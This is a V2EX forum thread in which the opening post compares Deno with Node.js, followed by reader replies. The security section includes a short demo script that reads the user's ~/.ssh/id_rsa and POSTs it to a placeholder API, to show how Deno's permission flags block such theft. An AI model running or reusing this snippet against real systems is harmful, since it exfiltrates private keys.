V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
推荐关注
Meteor
JSLint - a JavaScript code quality tool
jsFiddle
D3.js
WebStorm
推荐书目
JavaScript 权威指南第 5 版
Closure: The Definitive Guide
zhangchaojie
V2EX  ›  JavaScript

Deno 正式发布,彻底弄明白和 node 的区别

  •  1
     
  •   zhangchaojie · 2020-05-14 22:46:28 +08:00 · 10517 次点击
    这是一个创建于 1638 天前的主题,其中的信息可能已经有所发展或是发生改变。

    前言

    Deno 已经正式发布了🎉!

    我说这句话时候,是不是很多前端 和 NodeJS 工(码)程(农)师已经按不住自己的 40 米大刀了。心中的不仅感慨前端是真的会造轮子,有了 node 还不够吗,还没学会 node 又搞了个 deno,node 和 deno 啥区别?!

    的确,deno 和 node 形态很相似,要解决的问题似乎也相同,那他们到底有啥区别,这一切究竟是道德的沦丧还是 ry (作者)人性的扭曲,让我们走进本篇文章,一探究竟。

    Deno VS Node

    YDgtZd.png

    1.内置 API 引用方式不同

    node 模块导入

    node 内置 API 通过模块导入的方式引用,例如:

    const fs = require("fs");
    fs.readFileSync("./data.txt");
    

    deno 全局对象

    而 deno 则是一个全局对象 Deno 的属性和方法:

    Deno.readFileSync("./data.txt");
    

    具体 deno 有哪些方法,我们可以通过 repl 看一下:

    deno # 或 deno repl
    

    进入 repl 后,输入 Deno 回车,我们可以看到:

    {
     Buffer: [Function: Buffer],
     readAll: [AsyncFunction: readAll],
     readAllSync: [Function: readAllSync],
     writeAll: [AsyncFunction: writeAll],
     writeAllSync: [Function: writeAllSync],
     # .....
    }
    

    这种处理的方式好处是简单、方便,坏处是没有分类,想查找忘记的 API 比较困难。总体来说见仁见智。

    2.模块系统

    我们再来看一下模块系统,这也是 deno 和 node 差别最大的地方,同样也是 deno 和 node 不兼容的地方。

    node CommonJS 规范

    我们都知道 node 采用的是 CommonJS 规范,而 deno 则是采用的 ES Module 的浏览器实现,那么我们首先来认识一下:

    ES Module 的浏览器实现

    具体关于 ES Module 想必大家都早已熟知,但其浏览器实现可能大家还不是很熟悉,所以我们先看一下其浏览器实现:

    <body>
      <!-- 注意这里一定要加上 type="module" -->
      <script type="module">
        // 从 URL 导入
        import Vue from "https://unpkg.com/[email protected]/dist/vue.esm.browser.js";
        // 从相对路径导入
        import * as utils from "./utils.js";
        // 从绝对路径导入
        import "/index.js";
    
        // 不支持
        import foo from "foo.js";
        import bar from "bar/index.js";
        import zoo from "./index"; // 没有 .js 后缀
      </script>
    </body>
    

    deno 的模块规范

    deno 完全遵循 es module 浏览器实现,所以 deno 也是如此:

    // 支持
    import * as fs from "https://deno.land/std/fs/mod.ts";
    import { deepCopy } from "./deepCopy.js";
    import foo from "/foo.ts";
    
    // 不支持
    import foo from "foo.ts";
    import bar from "./bar"; // 必须指定扩展名
    

    我们发现其和我们平常在 webpack 或者 ts 使用 es module 最大的不同

    • 可以通过 import url 直接引用线上资源;

    • 资源不可省略扩展名和文件名。

    关于第 1 点,争议非常大,有人很看好,觉得极大的扩展了 deno 库的范围;有人则不太看好,觉得国内网速的原因,并不实用。大家的看法如何,欢迎在评论区发表 🤔

    3.安全

    如果模块规范是 node 和 deno 最大的不同,那么对安全的处理,则是另外一个让人摸不着头脑的地方。

    模拟盗号

    在介绍之前我们先思考一下这个场景会不会出现:

    我做了一个基于命令行的一键上网工具 breakwall,每月 1 个 G 免费流量,然后将压缩后的 JS 代码发布到 npm 上,然后后在各种渠道宣传一波。

    羊毛党兴高彩烈的 cnpm install -g breakwall,然后每次使用的时候,我偷偷的将诸位的 ssh 密钥和各种能偷的文档及图片偷偷上传到我的服务器,在设定期限到期后,删除电脑上资料,留下一句拿钱换资料,仅支持比特币。

    默认安全的 deno

    如果你觉得以上情况有可能出现,则会觉得下面的功能很实用。我们先用 deno 执行以下代码:

    // index.js
    let rsa = Deno.readFileSync(Deno.dir("home") + "/.ssh/id_rsa");
    
    rsa = new TextDecoder().decode(rsa);
    
    fetch("http://jsonplaceholder.typicode.com/posts/1", {
      method: "POST",
      body: JSON.stringify(rsa)
    })
      .then((res) => res.json())
      .then((res) => console.log("密钥发送成功,嘿嘿嘿😜"));
    
    console.log("start breakwall...");
    

    PS: --unstable 是由于 Deno.dir API 不稳定

    > deno run --unstable index.js
    

    我们将会得到如下报错信息:

    > deno run --unstable  index.js
    error: Uncaught PermissionDenied: access to environment variables, run again with the --allow-env flag
        ...
    

    意思就是权限异常,需要访问环境变量,需要加上 --allow-env,我们加上这个参数再试一下。

    > deno run --unstable --allow-env index.js
    error: Uncaught PermissionDenied: read access to "/Users/zhangchaojie/.ssh/id_rsa", run again with the --allow-read flag
        ...
    

    如此反复,还需加上 --allow-read--allow-net ,最终的结果是:

    > deno run --unstable --allow-env --allow-read --allow-net  index.js
    start breakwall...
    密钥发送成功,嘿嘿嘿😜
    

    经过一番折腾,总算是发送成功了,要想盗取密钥实属不易。

    白名单

    那有人就说了,如果我的应用确实需要访问网络和文件,但是有不想让它访问 .ssh 文件有没有办法?

    当然有了,我们可以给 --allow-read--allow-net 指定白名单,名单之外都不可访问,例如:

    > deno run --unstable --allow-env --allow-read --allow-net=https://www.baidu.com  index.js
    start breakwall...
    error: Uncaught PermissionDenied: network access to "http://jsonplaceholder.typicode.com/posts/1", run again with the --allow-net flag
        at unwrapResponse ($deno$/ops/dispatch_json.ts:43:11)
        at Object.sendAsync ($deno$/ops/dispatch_json.ts:98:10)
        at async fetch ($deno$/web/fetch.ts:591:27)
    

    简化参数

    如果确认是没问题,或者是自己开发软件时,图个方便,可以直接使用 -A--allow-all 参数允许所有权限:

    > deno -A --unstable index.js
    start breakwall...
    密钥发送成功,嘿嘿嘿😜
    

    安全这方面见仁见智,有人觉得是多余,有人觉得很好用,极大的增强了安全性。如果你属于觉得这个功能多余的,可以 deno run -A xxx 即可。

    4.兼容浏览器 API

    很多人不理解,为什么你一个服务端语言要兼容浏览器 API,以及怎么兼容。

    为什么要兼容浏览器 API

    关于为什么,我举个栗子大家就明白了:在设计 node 之处,关于输出函数本来叫 print 之类的,后来有人提议为什么不叫 console.log,ry 觉得挺不错,于是就接纳了意见。

    但是,这个设计并不是刻意为之,而 deno 的设计则可以为之,通过与浏览器 API 保持一致,来减少大家的认知

    怎么兼容浏览器 API

    概念上兼容
    • 模块系统,从上面介绍看出 deno 是完全遵循浏览器实现的;

    • 默认安全,当然也不是自己创造的概念,w3c 早已做出浏览器权限的规定,我们在做小程序的时候尤为明显,需要获取各种权限;

    • 对于异步操作返回 Promise ;

    • 使用 ArrayBuffer 处理二进制;

    • 等等...

    存在 window 全局变量
    console.log(window === this, window === self, window === globalThis);
    
    实现了 WindowOrWorkerGlobalScope 的全部方法

    具体方法列表,我们可以参考:lib.deno.shared_globals.d.tslib.deno.window.d.ts

    // 请求方法
    fetch("https://baidu.com");
    
    // base64 转化
    let encodedData = btoa("Hello, world"); // 编码
    let decodedData = atob(encodedData); // 解码
    
    // 微任务
    queueMicrotask(() => {
      console.log(123);
    });
    
    // 等等...
    
    大趋势

    总体而言,如果服务端和浏览器端存在相同概念,deno 就不会创造新的概念。这一点其实 node 也在做,新的 node 14.0 CHANGELOG 就也提及要实现 Universal JavaScriptSpec compliance and Web Compatibility的思想,所以这点大家应该都会接受吧,毕竟大势所趋趋势。

    5.支持 Typescript

    不管你喜欢与否,2020 年了,必须学习 TS 了(起码在面试的时候是亮点)。学完之后你才会明白王境泽定律真的无处不在。

    // index.ts
    let str: string = "王境泽定律";
    str = 132;
    
    > deno run index.ts
    error TS2322: Type '123' is not assignable to type 'string'.
    
    ► file:///Users/zhangchaojie/Desktop/index.ts:2:1
    
    2 str = 123
      ~~~
    

    6.去 node_modules

    deno 没有 node_modules,那么它是怎么进行包管理的呢?我们先看下面的例子

    // index.js
    import { white, bgRed } from "https://deno.land/std/fmt/colors.ts";
    
    console.log(bgRed(white("hello world!")));
    
    > deno run index.js
    Download https://deno.land/std/fmt/colors.ts
    Compile https://deno.land/std/fmt/colors.ts
    hello world!
    

    我们看到其有 DownloadCompile 两个步骤,我们会产生几个疑问:

    1 、每次执行都要下载吗?

    解:我们只需要再执行一次就能明白,不需要每次下载。

    > deno run index.js
    hello world!
    

    2 、Download 和 Compile 的文件在哪里呢?

    解:我们会发现,当前执行的目录,并没有 Download 和 Compile 文件,那文件放在哪里呢,我们首先来看一下 deno --help 命令:

    > deno --help
    SUBCOMMANDS:
    # ...
    info           Show info about cache or info related to source file
    
    # ...
    ENVIRONMENT VARIABLES:
        DENO_DIR   Set deno's base directory (defaults to $HOME/.deno)
    

    deno info 命令展示了依赖关系,类似 package.json

    > deno info index.js
    local: /Users/zhangchaojie/Desktop/index.js
    type: JavaScript
    deps:
    file:///Users/zhangchaojie/Desktop/index.js
      └── https://deno.land/std/fmt/colors.ts
    

    DENO_DIR 则为实际的安装和编译目录,相当于 node_modules,默认为 $HOME/.deno(命令提示是这样的,但实际需要指定一下环境变量 export DENO_DIR=$HOME/.deno),我们看一下:

    > tree $HOME/.deno
    /Users/zhangchaojie/.deno
    ├── deps
    │   └── https
    │       └── deno.land
    │           ├── 3574883d8acbaf00e28990ec8e83d71084c4c668c1dc7794be25208c60cfc935
    │           └── 3574883d8acbaf00e28990ec8e83d71084c4c668c1dc7794be25208c60cfc935.metadata.json
    └── gen
        └── https
            └── deno.land
                └── std
                    └── fmt
                        ├── colors.ts.js
                        ├── colors.ts.js.map
                        └── colors.ts.meta
    
    8 directories, 5 files
    

    3 、没网络了怎么办?

    我们有些场景是将本地写好的代码部署到没有网络的服务器,那么当执行 deno run xxx 时,就是提示 error sending request 。

    解:将上面的缓存目录内容,直接拷贝到服务器并指定环境变量到其目录即可。

    4 、依赖代码更新了怎么办?

    解:当依赖模块更新时,我们可以通过 --reload 进行更新缓存,例如:

    > deno run --reload index.js
    

    我们还可以通过白名单的方式,只更新部分依赖。例如:

    > deno run --reload=https://deno.land index.js
    

    5 、仅缓存依赖,不执行代码有办法吗?

    解:有的,我们可以通过 deno cache index.js 进行依赖缓存。

    6 、多版本怎么处理?

    解:暂时没有好的解决方案,只能通过 git tag 的方式区分版本。

    7.标准模块 与 node API 兼容

    我们通过第 1 点可以看到,其实 deno 的 API 相对于 node 其实是少一些的,通过其文件大小也能看出来:

    > ll /usr/local/bin/node /Users/zhangchaojie/.local/bin/deno
    -rwxr-xr-x  1   42M   /Users/zhangchaojie/.local/bin/deno
    -rwxr-xr-x  1   70M   /usr/local/bin/node
    

    那这些少的 API 只能自己写或者求助于社区吗?

    deno 对于自身相对于 node 少的和社区中常用的功能,提供了标准模块,其特点是不依赖非标准模块的内容,达到社区内的模块引用最后都收敛于标准模块的效果。例如:

    // 类似 node 中 chalk 包
    import { bgRed, white } from "https://deno.land/std/fmt/colors.ts";
    
    // 类似 node 中的 uuid 包
    import { v4 } from "https://deno.land/std/uuid/mod.ts";
    

    同时为了对 node 用户友好,提供了 node API 的兼容

    import * as path from "https://deno.land/std/node/path.ts";
    import * as fs from "https://deno.land/std/node/fs.ts";
    
    console.log(path.resolve('./', './test'))
    

    所以,大家在为 deno 社区做贡献的时候,首先要看一下标准模块有没有提供类似的功能,如果已经提供了可以进行引用。

    8.异步操作

    根据 ry 自己是说法,在设计 node 是有人提议 Promise 处理回调,但是他没听,用他自己的话说就是愚蠢的拒绝了。

    node 用回调的方式处理异步操作、deno 则选择用 Promise

    // node 方式
    const fs = require("fs");
    fs.readFile("./data.txt", (err, data) => {
      if (err) throw err;
      console.log(data);
    });
    

    另外 deno 支持 top-level-await,所以以上读取文件的代码可以为:

    // deno 方式
    const data = await Deno.readFile("./data.txt");
    console.log(data);
    

    node 关于这方面也在一直改进,例如社区上很多 promisify 解决方案,通过包裹一层函数,实现目的。例如:

    // node API promisify
    const { promisify } = require("es6-promisify");
    const fs = require("fs");
    
    // 没有 top-level-await,只能包一层
    async function main() {
      const readFile = promisify(fs.readFile);
      const data = await readFile("./data.txt");
      console.log(data);
    }
    
    main();
    

    9.单文件分发

    我们知道 npm 包必须有 package.json 文件,里面不仅需要指明 mainmodulebrowser 等字段来标明入口文件,还需要指明 namelicensedescription 等字段来说明这个包。

    ry 觉得这些字段扰乱了开发者的视听,所以在 deno 中,其模块不需要任何配置文件,直接是 import url 的形式。

    10.去中心化仓库

    对于 www.npmjs.com 我们肯定都不陌生,它是推动 node 蓬勃发展的重要支点。但作者认为它是中心化仓库,违背了互联网去中心化原则。

    所以 deno 并没有一个像 npmjs.com 的仓库,通过 import url 的方式将互联网任何一处的代码都可以引用。

    PS:deno 其实是有个基于 GitHub 的第三方模块集合

    11.去开发依赖

    我们在写一个 node 库或者工具时,开发依赖是少不了的,例如 babel 做转化和打包、jest 做测试、prettier 做代码格式化、eslint 做代码格式校检、gulp 或者 webpack 做构建等等,让我们在开发前就搞得筋疲力尽。

    deno 通过内置了一些工具,解决上述问题。

    • deno bundle:打包命令,用来替换 babelgulp 一类工具: 例如:deno bundle ./mod.ts
    • deno fmt:格式化命令,用来替换 prettier 一类工具,例如:deno fmt ./mod.ts
    • deno test:运行测试代码,用来替换 jest 一类工具,例如 deno test ./test.ts
    • deno lint:代码校检(暂未实现),用来替换 eslint 一类工具,例如:deno lint ./mod.ts

    后记

    就像小时候一直幻想的炸弹始终没能炸了学校,技(轮)术(子)的进(制)步(造)一直也未停止过。不论我们学的动或者学不动,技术就在那里,不以人的意志为转移。

    至于 deno 能不能火,我个人觉得起码一两年内不会有太大反响,之后和 node 的关系有可能像 Vue 和 react,有人喜欢用 deno,觉得比 node 好一万倍,有人则喜欢 node,觉得 node 还能再战 500 年。至于最终学不学还看自己。

    如果觉得文章不错,记得点赞、收藏啦~~~~

    62 条回复    2023-03-30 20:49:44 +08:00
    putaozhenhaochi
        1
    putaozhenhaochi  
       2020-05-14 23:01:42 +08:00 via Android   ❤️ 1
    看起来真香
    HTSdTt3WygdgQQGe
        2
    HTSdTt3WygdgQQGe  
       2020-05-14 23:13:18 +08:00 via Android
    真大佬,费心了,可惜没看懂
    crella
        3
    crella  
       2020-05-14 23:27:30 +08:00 via Android
    为什么要设定全局名称 Deno.xx 来执行标准库提供的函数呢?以后也不好改的啊?

    不懂 js 。
    timothyye
        4
    timothyye  
       2020-05-15 01:03:25 +08:00
    deno 没有 node_modules,看来终于看不惯这个黑洞了,哈哈
    timothyye
        5
    timothyye  
       2020-05-15 01:13:04 +08:00
    这里有个油管的介绍视频,也不错

    What is Deno & Will it replace Node.js?
    rayhy
        6
    rayhy  
       2020-05-15 06:41:09 +08:00 via Android
    好事。之前 js 那些很火的库可以继续用吗?
    murmur
        7
    murmur  
       2020-05-15 08:01:08 +08:00   ❤️ 4
    所有 api 都挂一个命名空间下,有 php 那个味了
    stellar
        8
    stellar  
       2020-05-15 08:03:30 +08:00 via Android   ❤️ 3
    业界又要出现一批布道师了
    jinliming2
        9
    jinliming2  
       2020-05-15 08:10:46 +08:00 via iPhone
    node API promisify 为啥要 const { promisify } = require("es6-promisify"); 引入第三方包?
    node v8 就加进去的 const { promisify } = require('util'); 工具函数不香吗?
    orm
        10
    orm  
       2020-05-15 08:11:52 +08:00
    在我使用的 Arch Linux 中,DENO_DIR 是$HOME/.cache/deno
    cokyhe
        11
    cokyhe  
       2020-05-15 08:37:45 +08:00   ❤️ 7
    delete nodejs 简称 deno ?
    dodo2012
        12
    dodo2012  
       2020-05-15 08:41:55 +08:00   ❤️ 4
    没有包管理,弄的和开始的 golang 一样,结果 golang 现在用起来 go mod 了,到时包管理估计是个大坑
    ysc3839
        13
    ysc3839  
       2020-05-15 08:48:26 +08:00 via Android
    印象中 npm 也不是非得用 npmjs 吧?可以从 git 仓库安装的。
    randyo
        14
    randyo  
       2020-05-15 08:54:28 +08:00 via Android
    请问 import url 没有黑洞吗?别的模块也 import 了其他模块,这和 node_modules 有区别吗?
    onfuns
        15
    onfuns  
       2020-05-15 08:58:53 +08:00
    url 引入,要是内网不还是要弄个配置文件,然后加载前先 download 下来包然后再引入,跟 node_modules 没什么区别啊
    to2false
        16
    to2false  
       2020-05-15 08:59:58 +08:00
    GFW 这么顶,去中心 url 没有个替代方案,就很难搞
    7gugu
        17
    7gugu  
       2020-05-15 09:08:18 +08:00
    url 引入还是非常有用的,如果资源可以放置到内网或者使用国内的 cdn 进行加速,应该还是会很香的
    xuxuzhaozhao
        18
    xuxuzhaozhao  
       2020-05-15 09:12:37 +08:00
    这个东西可以哈,真的烦 node_modules
    c2boy
        19
    c2boy  
       2020-05-15 09:15:33 +08:00
    @cokyhe 就是把 node 反过来
    justin2018
        20
    justin2018  
       2020-05-15 09:15:34 +08:00
    没看到详细的包管理介绍~~~

    现有的 node 第三方库是不是都需要重写改造才能给 deno 用 😓
    tanranran
        21
    tanranran  
       2020-05-15 09:19:12 +08:00
    @cokyhe #11 #11 是 destory node
    DOLLOR
        22
    DOLLOR  
       2020-05-15 09:25:06 +08:00
    @onfuns
    @randyo
    感觉没什么区别,node 是安装项目的时候下载依赖,deno 是运行的时候下载依赖,时间久了,“$HOME/.deno”不就跟“node_modules”一样无底洞了?🤔
    no1xsyzy
        23
    no1xsyzy  
       2020-05-15 09:31:30 +08:00
    把缓存一起复制到服务器上有点苟,与当前项目无关的是不是也复制过去了?
    我觉得最可能发生的是 python venv 那样运行前改环境变量的做法
    @randyo #14 这个是 std 尝试解决的问题…… 强行想要黑洞的话没有哪个环境能阻止,必须靠 “官方” 的底层包。
    xiaoyu18369
        24
    xiaoyu18369  
       2020-05-15 09:31:48 +08:00
    感觉前端这些年出现的东西实在是太多了,都跟不上了
    Leonard
        25
    Leonard  
       2020-05-15 09:34:30 +08:00
    @cokyhe 明明是 node 音节反过来读
    no1xsyzy
        26
    no1xsyzy  
       2020-05-15 09:35:48 +08:00
    @DOLLOR #22 一个无底洞好,一百个无底洞糟(
    xrr2016
        27
    xrr2016  
       2020-05-15 09:39:24 +08:00
    赞一个👍
    guog
        28
    guog  
       2020-05-15 09:44:30 +08:00 via Android
    这解决了 node module 多项目依赖冲突吗?
    Chenamy2017
        29
    Chenamy2017  
       2020-05-15 09:47:59 +08:00
    引用:"Electron 基于两大极具魅力的技术:Node.js (或简称 Node )和 Chromium"
    问题:会影响 Electron 的发展吗,入坑 Electron 的我表示心里很慌
    hantsy
        30
    hantsy  
       2020-05-15 09:50:02 +08:00
    希望再一次合并到 Node
    dinjufen
        31
    dinjufen  
       2020-05-15 10:12:55 +08:00
    @Chenamy2017 真要等 deno 发展起来了,估计 electron 也会提供对应版本的,或者有新的类似东西出来,只是环境不同而已,API 都是接近的,学习成本很低
    sam014
        32
    sam014  
       2020-05-15 10:31:16 +08:00
    1. deno ts 跟 go 很像, 万一那天说 deno 能编译个二进制包出来我也不意外(狗头 /笑哭)
    2. 关于回调函数和 promise 的争议,node 早就支持了(promise/async),虽然是在 RY 离开 node 之后(应该是吧)
    3. 放弃了 node_modules 和 npm, 选择了以 Github 为基础的管理方式, 结果都绕不开巨硬
    4. 会不会哪天像 node/io.js 一样 , node/deno 就合并了, 毕竟跟 MS 牵扯这么多(github 、npm 、ts)
    marcong95
        33
    marcong95  
       2020-05-15 10:46:32 +08:00
    import url 真的好吗?到时候文件头一坨 import 滚个几分钟才到第一行代码

    全局对象的 API 也是十分阔怕。。。

    这难道就是传说中的矫枉过正
    Phariel
        34
    Phariel  
       2020-05-15 11:05:50 +08:00
    换家乐 乐换家

    Go 的类 ES Module 实现还是想往包管理靠 已经实现好包管理的又想往 ES Module 上靠

    别人碗里的都是最香的
    natforum
        35
    natforum  
       2020-05-15 11:37:31 +08:00
    为啥我一个外行也觉得 Deno 好
    maomaomao001
        36
    maomaomao001  
       2020-05-15 12:06:04 +08:00
    他的这个安全模式还是很奇怪啊, 就像 android . 不给权限就不运行 , 不可以是沙箱时,给它一个空目录之类的读写吗?
    ohao
        37
    ohao  
       2020-05-15 12:11:03 +08:00
    大佬造"真工具"的速度太快
    会不会导致学不过来了? /逃

    我们之前那个"木兰",还有下文嘛?
    realkenshinji
        38
    realkenshinji  
       2020-05-15 12:33:41 +08:00 via iPhone
    @to2false 肉翻吧
    hxtheone
        39
    hxtheone  
       2020-05-15 17:26:18 +08:00
    内置 API 放全局对象, 这审美, 个人完全接受不能
    seakingii
        40
    seakingii  
       2020-05-15 17:32:26 +08:00
    感觉吸取了不少 GO 的思想
    basstk
        41
    basstk  
       2020-05-15 18:00:48 +08:00
    留名,关注中
    KuroNekoFan
        42
    KuroNekoFan  
       2020-05-15 18:49:32 +08:00
    只是 node_modules 问题的话,用 pnpm 之类的代替 npm 不就完事了,主要卖点还是`服务端 typescript 运行时`吧
    markocen
        43
    markocen  
       2020-05-15 22:20:43 +08:00
    目前 npm 上的库, 如果内部没有直接使用 Node API, 是可以直接在 Deno 里用的
    Deno 也有个项目正在做 https://deno.land/std/node/, 用来适配 Node API
    xcstream
        44
    xcstream  
       2020-05-16 01:51:57 +08:00
    npm 可以用 cnpm 加速
    github 就比较慢了
    reiji
        45
    reiji  
       2020-05-16 02:57:24 +08:00 via Android
    马一个,睡醒学
    zhw2590582
        46
    zhw2590582  
       2020-05-16 07:38:59 +08:00
    那旧的 npm 包不都要重构了?
    weixiangzhe
        47
    weixiangzhe  
       2020-05-16 08:50:18 +08:00 via Android
    意义不大,前台项目没有包管理很危险,后端项目一般一机也是部署一个服务, 好处是本机可以节约好多空间,上上周周删了 yarn 的 cache,256 的机器直接多出 60g 的空间,瞬间惊了
    weixiangzhe
        48
    weixiangzhe  
       2020-05-16 08:51:34 +08:00 via Android
    个人觉得可以用来写写脚本是挺好的,写好直接丢同事,不用再跑前再安装依赖啦
    owencodeing
        49
    owencodeing  
       2020-05-16 10:17:03 +08:00
    马克一下
    namelosw
        50
    namelosw  
       2020-05-16 10:24:30 +08:00
    挺好的,逐渐和浏览器合流了
    要是 Chromium 也有这个觉悟内置 TypeScript transpiler 能开发用就好了
    codeloster
        51
    codeloster  
       2020-05-16 10:32:08 +08:00
    记得早期 node 还不兼容 ES 的时候,分出了一个兼容的 node,火了那么一小会。然后 node 根据 ES 标准,它就消失了。Deno 可能也是这命运。
    Rrrrrr
        52
    Rrrrrr  
       2020-05-16 10:46:48 +08:00
    真香,写脚本会很好用吧
    xiangyuecn
        53
    xiangyuecn  
       2020-05-16 10:48:14 +08:00
    import url 会固化版本吗?还是说别人更新了 1 行代码的库有毛病,然后全网几百万项目挂掉?别的包的内部依赖了几个 G 我不管,我自己依赖了哪些玩意能不能方便的查看到?

    另外全局对象真的是全局,优雅过头了点吧。。这个全局玩意,也说不上哪里不好,但就是不好😂
    whypool
        54
    whypool  
       2020-05-16 10:58:47 +08:00
    import url 的文件又 import 另一个 url 无限套娃怎么破?
    这还不如直接抄 jar 包管理,中心化的仓库是必须的,不然就是群魔乱舞
    就看谁先走到这一步,发布的包进行编译压缩,加入本地版本控制,现在的 node 项目在线上服务器跑 npm install,有大量的 cache,云服务器的硬盘又少根本遭不住

    既然发布了正式版,那么 web 框架大佬也得搞一个,是骡子是马 benchmark 一下看看
    newghost
        55
    newghost  
       2020-05-16 11:01:46 +08:00
    promise 性能比回调差很多,不知道这个库底层是怎么实现的,如果只是暴露了 async 接口那还好,如果全是 async/await 写的,那只能呵呵了……
    12101111
        56
    12101111  
       2020-05-16 14:21:50 +08:00
    @newghost 标准 js 的 promise 是 v8 自带的,Deno 里 IO 的 promise 是 Rust 的 future 的包装,其运行时是 tokio
    promise 的思想和 Rust 的 future 基本一样,而 Rust 的 future 是零开销抽象,也就是用了 Rust 的 future 写出的异步代码和用手写的回调 /状态机的性能相同或者更好
    Messiahhh
        57
    Messiahhh  
       2020-05-16 14:28:29 +08:00
    环境最重要
    cjh1095358798
        58
    cjh1095358798  
       2020-05-16 21:37:08 +08:00
    厉害啊
    china521
        59
    china521  
       2020-05-17 12:07:09 +08:00
    老夫就是 jquery 一把梭, 有学框架的功夫,已经写完了
    DoodleSit
        60
    DoodleSit  
       2020-05-17 15:20:34 +08:00
    no de
    de no

    中心对称二阶矩阵
    gitawego
        61
    gitawego  
       2020-05-18 04:18:14 +08:00
    其实觉得不是好事,js 社区太不团结,总是一言不合就创新项目,而不直接贡献给现有 node 社区。就算 deno 从单个性能上说再厉害,没有社区其实没意义。node 已经和 js 社区合并,社区非常健康,大家都奔着同一个目标。
    而 deno 却不是,而且现在还没开始就有内部分歧了,所以非常不看好。虽然有些自己独特的地方,不过我觉得 nodejs 会走得更远更好。
    shingu
        62
    shingu  
       2023-03-30 20:49:44 +08:00
    有点挖坟的嫌疑了。不过,通过搜索找到这篇文章,觉得讲的比较在理,所以回复一下。

    已经过去快 3 年了,deno 也就那样,不知道算不算个鸡肋。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2394 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 32ms · UTC 16:06 · PVG 00:06 · LAX 08:06 · JFK 11:06
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.